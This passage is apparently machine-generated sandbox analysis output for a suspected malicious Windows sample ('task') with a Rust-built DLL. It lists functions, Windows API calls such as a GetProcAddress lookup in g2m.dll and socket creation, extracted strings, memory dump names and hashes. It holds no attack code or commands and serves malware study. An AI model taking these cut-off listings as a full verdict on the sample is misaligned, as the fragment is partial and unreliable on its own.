                                                                                                                                                                • SymFunctionTableAccess64, xrefs: 6C8D913E
                                                                                                                                                                • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6C8D92F8
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressCurrentProc$ErrorLast$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$stack backtrace:
                                                                                                                                                                • API String ID: 1741357895-2373373428
                                                                                                                                                                • Opcode ID: 842ae3a735f554aa9be8e488ff29212f5189b45ed0c7feeb940eeabdc957b02e
                                                                                                                                                                • Instruction ID: 4c5d63a9fb51b2f6ca08c5673ff81feb96fb7348ed84747add5037541c765582
                                                                                                                                                                • Opcode Fuzzy Hash: 842ae3a735f554aa9be8e488ff29212f5189b45ed0c7feeb940eeabdc957b02e
                                                                                                                                                                • Instruction Fuzzy Hash: D2E146B1644B009FE730CF25C954B83BBF4BB49318F108D2DE9AA87A91EB75B449CB51
                                                                                                                                                                Function 00401000 Relevance: 23.0, APIs: 9, Strings: 4, Instructions: 220libraryloaderwindowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetCommandLineW.KERNEL32 ref: 0040102E
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 004010E5
                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004010ED
                                                                                                                                                                • GetStartupInfoW.KERNEL32(?), ref: 0040110F
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00401124
                                                                                                                                                                • GetModuleHandleA.KERNEL32(g2m.dll), ref: 004012B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004012DD
                                                                                                                                                                • MessageBoxA.USER32(00000000,004020D0,004020F8,00001010), ref: 00401365
                                                                                                                                                                • ExitProcess.KERNEL32 ref: 0040136E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1571404292.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1571376406.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1571419937.0000000000402000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1571437244.0000000000405000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Module$ExitHandleProcess$AddressCommandFileInfoLineMessageNameProcStartup
                                                                                                                                                                • String ID: @$L @$g2m.dll$ @
                                                                                                                                                                • API String ID: 195749359-3595644552
                                                                                                                                                                • Opcode ID: ceec47a5d53db67a8d79af026ed4ac63fb2276ab56d47e98b41f77515e37c241
                                                                                                                                                                • Instruction ID: 63a75bd892d71ac9ed38526556f16685a0eeff41e3f2f7a4e783f2f0301856aa
                                                                                                                                                                • Opcode Fuzzy Hash: ceec47a5d53db67a8d79af026ed4ac63fb2276ab56d47e98b41f77515e37c241
                                                                                                                                                                • Instruction Fuzzy Hash: 18B1E570D00269CFDF25DFA4C988BEDBBB0BB08305F1045AAD919B72A1D7B85A85CF15
                                                                                                                                                                Function 6C8DD920 Relevance: 12.7, APIs: 10, Instructions: 181COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                • Opcode ID: 51804701cc93db0c2293a627b02296920798baec3bca32aaa2481faad2d476c3
                                                                                                                                                                • Instruction ID: b2eb69b4fab15f93dd1e504de58c6ae60ba78657f4cbebf4e7cb932f7e471b7d
                                                                                                                                                                • Opcode Fuzzy Hash: 51804701cc93db0c2293a627b02296920798baec3bca32aaa2481faad2d476c3
                                                                                                                                                                • Instruction Fuzzy Hash: 4E5106717452549BDF309F61898478A7BB8FF06B08F16886AD9146B640D734F401CFB5
                                                                                                                                                                Function 6C8F4496 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • type_info::operator==.LIBVCRUNTIME ref: 6C8F45B5
                                                                                                                                                                • ___TypeMatch.LIBVCRUNTIME ref: 6C8F46C3
                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 6C8F4815
                                                                                                                                                                • CallUnexpected.LIBVCRUNTIME ref: 6C8F4830
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                • API String ID: 2751267872-393685449
                                                                                                                                                                • Opcode ID: 861c43bc52db5d9958bbab4a2bf56883a9d132805f95855db12cec9314532bc8
                                                                                                                                                                • Instruction ID: 20afb6d8b38e258b579535f00769af85798d6953f97004cf72356281abad5a86
                                                                                                                                                                • Opcode Fuzzy Hash: 861c43bc52db5d9958bbab4a2bf56883a9d132805f95855db12cec9314532bc8
                                                                                                                                                                • Instruction Fuzzy Hash: CAB19A71C00219EFCF25CF94CB8099EB7B5BFC9398B14496AE8206BA01D731DA56CF91
                                                                                                                                                                Function 6C904D80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • InitOnceBeginInitialize.KERNEL32(?,00000000,00000000,00000000,?,?,6C8E0194), ref: 6C904DAA
                                                                                                                                                                • TlsAlloc.KERNEL32(?,6C8E0194), ref: 6C904DC2
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000000,00000000,?,6C8E0194), ref: 6C904DF2
                                                                                                                                                                • TlsAlloc.KERNEL32(?,?,6C8E0194,6C9331B8,6C8E0A00,FFFFFFFF,?,6C8DAF6E), ref: 6C904DFC
                                                                                                                                                                • TlsFree.KERNEL32(6C8E0A00,?,6C8E0194,6C9331B8,6C8E0A00,FFFFFFFF,?,6C8DAF6E), ref: 6C904E27
                                                                                                                                                                • InitOnceComplete.KERNEL32(?,00000004,00000000,00000000,6C90E640), ref: 6C904E5A
                                                                                                                                                                Strings
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C904E75, 6C904EA5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitOnce$AllocComplete$BeginFreeInitialize
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs
                                                                                                                                                                • API String ID: 977713646-1397593039
                                                                                                                                                                • Opcode ID: 21b36bf922d925c296c892b46fdde5a049ffee6b79d81c10d5e430e9e9ce262c
                                                                                                                                                                • Instruction ID: 9b4e0092d712260bc89d678002daab1eda2f71aa3ea13a6c68cf750b7d2e82e3
                                                                                                                                                                • Opcode Fuzzy Hash: 21b36bf922d925c296c892b46fdde5a049ffee6b79d81c10d5e430e9e9ce262c
                                                                                                                                                                • Instruction Fuzzy Hash: D8316A70B002199BDF10DFA4C848BEEB7B8FB19319F20851CE564E7680D774A944CFA5
                                                                                                                                                                Function 6C8F98D0 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _strrchr
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3213747228-0
                                                                                                                                                                • Opcode ID: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction ID: 929dda377d95b35f59d8fdc14bf9f97fa21e1225d3be0516427be6b4b72335b4
                                                                                                                                                                • Opcode Fuzzy Hash: df27ad26c0ca7bb847937b8044854fb6828265a1c7ba2084fc8d6cd1c4f4517d
                                                                                                                                                                • Instruction Fuzzy Hash: 53B18B32A04265AFDB218F68CD81BDE7BA5EF56398F144966E464AB781D370D803C7A0
                                                                                                                                                                Function 6C8DCE30 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetStdHandle.KERNEL32(FFFFFFF5,?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D6885,6C904A78), ref: 6C8DCE67
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C8D6885,6C904A78), ref: 6C8DCE76
                                                                                                                                                                • GetConsoleMode.KERNEL32(00000000,?), ref: 6C8DCEBA
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,6C90CC54,6C90E46C,?,?,6C90E45C), ref: 6C8DD15A
                                                                                                                                                                Strings
                                                                                                                                                                • called `Result::unwrap()` on an `Err` value, xrefs: 6C8DD10F
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6C8DD0C0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$called `Result::unwrap()` on an `Err` value
                                                                                                                                                                • API String ID: 1170577072-848266592
                                                                                                                                                                • Opcode ID: 9930be6bdb26a161790ffc1ebbd93599fc74976d9e4f73277f17860c13912b9a
                                                                                                                                                                • Instruction ID: da5be3205064b2ecfbba8a22b34d06f677cb90bdc6e61e35f7220930e990fd7c
                                                                                                                                                                • Opcode Fuzzy Hash: 9930be6bdb26a161790ffc1ebbd93599fc74976d9e4f73277f17860c13912b9a
                                                                                                                                                                • Instruction Fuzzy Hash: 65A1C2B1D04258DBCF20DFA4C940BDEBBB5AF46304F14891EE851AB782D774A945CFA1
                                                                                                                                                                Function 6C8F3D50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3D87
                                                                                                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 6C8F3D8F
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3E18
                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 6C8F3E43
                                                                                                                                                                • _ValidateLocalCookies.LIBCMT ref: 6C8F3E98
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                • String ID: csm
                                                                                                                                                                • API String ID: 1170836740-1018135373
                                                                                                                                                                • Opcode ID: 1736cc9f187fca880f1e474208eb101496f198d17b23e4cb905b27661b9cccc9
                                                                                                                                                                • Instruction ID: b4883322c368553e108a4ea7a28f0aabfb9e24b54bf4e141db8cc199000f5c12
                                                                                                                                                                • Opcode Fuzzy Hash: 1736cc9f187fca880f1e474208eb101496f198d17b23e4cb905b27661b9cccc9
                                                                                                                                                                • Instruction Fuzzy Hash: F741C534A002089BCF10DF69C980A9EBBB5BF45358F108965E9345BB51D731EE56CBA1
                                                                                                                                                                Function 6C8F88D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,6C8F89DF,00000000,6C8F80F4,00000000,00000000,00000001,?,6C8F8B58,00000022,FlsSetValue,6C912308,6C912310,00000000), ref: 6C8F8991
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                • Opcode ID: ce527ba008ffb461a3e69443acdec78fabc3b472c8a070d6099aeb390e69a33f
                                                                                                                                                                • Instruction ID: 0f3be71ca20c8476a831930ea5ebb71233af6c5182bb5710150335a4d675889c
                                                                                                                                                                • Opcode Fuzzy Hash: ce527ba008ffb461a3e69443acdec78fabc3b472c8a070d6099aeb390e69a33f
                                                                                                                                                                • Instruction Fuzzy Hash: 50216B36704511ABCB319A678D40A4E3B78EB033E8F200926ED65A7681D730FA02C6D1
                                                                                                                                                                Function 6C8DCA20 Relevance: 10.6, APIs: 7, Instructions: 65networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000081), ref: 6C8DCA4D
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6C8DCA65
                                                                                                                                                                • WSASocketW.WS2_32(00000017,00000000,00000000,00000000,00000000,00000001), ref: 6C8DCA83
                                                                                                                                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 6C8DCA95
                                                                                                                                                                • WSAGetLastError.WS2_32 ref: 6C8DCAAC
                                                                                                                                                                • GetLastError.KERNEL32 ref: 6C8DCABD
                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 6C8DCACD
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$Socket$HandleInformationclosesocket
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3114377017-0
                                                                                                                                                                • Opcode ID: 0eeca99ceb48483e61b11900e894b00d756b50c62233668ae0f4bab6fbc66b76
                                                                                                                                                                • Instruction ID: 0b430bc1a5a4ceb7a6e68b6a5f74338c396bad7aaac2055f1aeabd7e12768131
                                                                                                                                                                • Opcode Fuzzy Hash: 0eeca99ceb48483e61b11900e894b00d756b50c62233668ae0f4bab6fbc66b76
                                                                                                                                                                • Instruction Fuzzy Hash: 30117FB0344700EBEB309F248D84B167BF9EB46B60F21496DF955D76C2D3B5A880C760
                                                                                                                                                                Function 6C8FDF57 Relevance: 9.3, APIs: 6, Instructions: 292COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8dbc27bd5c551eeb6041c9f51bcb7fdf7b768bf120dc0f6ca04f75b53b430db2
                                                                                                                                                                • Instruction ID: f1681edb56bde57c6e0a6b96b4e06014ed5a695f7bf615588453dd3ec7f3bae4
                                                                                                                                                                • Opcode Fuzzy Hash: 8dbc27bd5c551eeb6041c9f51bcb7fdf7b768bf120dc0f6ca04f75b53b430db2
                                                                                                                                                                • Instruction Fuzzy Hash: 6EB11774A082489FDB21CF9DCA80BAD7BB4BF47389F144A69E42497781D7719943CF90
                                                                                                                                                                Function 6C8F415F Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000001,?,6C8F3F31,6C8F0F0A,6C8F08EE,?,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280,0000000C,6C8F0C1F), ref: 6C8F416D
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6C8F417B
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6C8F4194
                                                                                                                                                                • SetLastError.KERNEL32(00000000,6C8F0B26,?,00000001,?,?,00000001,?,6C91B280,0000000C,6C8F0C1F,?,00000001,?), ref: 6C8F41E6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573713770.000000006C935000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_8_2_6c8a0000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                • Opcode ID: efc8431f351dd328f778dce6dc25b592156d4d3d3ee5006b4500a6d23517684a
                                                                                                                                                                • Instruction ID: daf7a276e52173360156fc5419eeac7d192535ea8b0a858db8d75093d8ec305e
                                                                                                                                                                • Opcode Fuzzy Hash: efc8431f351dd328f778dce6dc25b592156d4d3d3ee5006b4500a6d23517684a
                                                                                                                                                                • Instruction Fuzzy Hash: 1901F57234D3155EE731067A6F445472AB4EBD23F9730473BE534829D0EB61489B6144
                                                                                                                                                                Function 6C8D7550 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 309COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6C8D78E3, 6C8D7900
                                                                                                                                                                • assertion failed: len >= mem::size_of::<c::sockaddr_in>(), xrefs: 6C8D791D, 6C8D795A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000008.00000002.1573540919.000000006C8A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8A0000, based on PE: true
                                                                                                                                                                • Associated: 00000008.00000002.1573458221.000000006C8A0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573600735.000000006C906000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573632237.000000006C91D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573660438.000000006C91E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                • Associated: 00000008.00000002.1573690326.000000006C933000.00000004.00000001.01000000.00000006.sdmpDownload File
